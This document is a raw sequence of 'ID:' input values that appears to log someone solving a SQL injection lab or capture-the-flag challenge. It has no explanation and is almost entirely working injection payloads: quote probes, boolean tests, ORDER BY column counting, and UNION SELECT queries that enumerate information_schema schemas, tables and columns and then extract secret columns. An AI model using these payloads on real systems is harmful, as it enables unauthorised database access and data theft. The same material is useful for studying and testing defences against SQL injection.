ID:1
ID:1'
ID:-1' union select 1,2,3 -- 
ID:
ID:1
ID:2
ID:3
ID:4
ID:5
ID:6
ID:7
ID:8
ID:9
ID:10
ID:11
ID:1
ID:1'
ID:1"
ID:1')
ID:1 and 1=1
ID:1'
ID:1' and 1=1 #
ID:1' and 1=2 #
ID:1' and order by 4 #
ID:1' union select 1,group_concat(schema_name),3 from information_schema.schemata  #
ID:-1' union select 1,group_concat(schema_name),3 from information_schema.schemata  #
ID:-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema = 'challenges'  #
ID:-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name = 'H3D12QQH6P'  #
ID:-1' union select 1,group_concat(secret_8WTW),3 from H3D12QQH6P  #
ID:-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema = 'CHALLENGES'  #
ID:-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name = 'ST8PASK3ZR'  #
ID:-1' union select 1,group_concat(secret_7IDH),3 from ST8PASK3ZR #
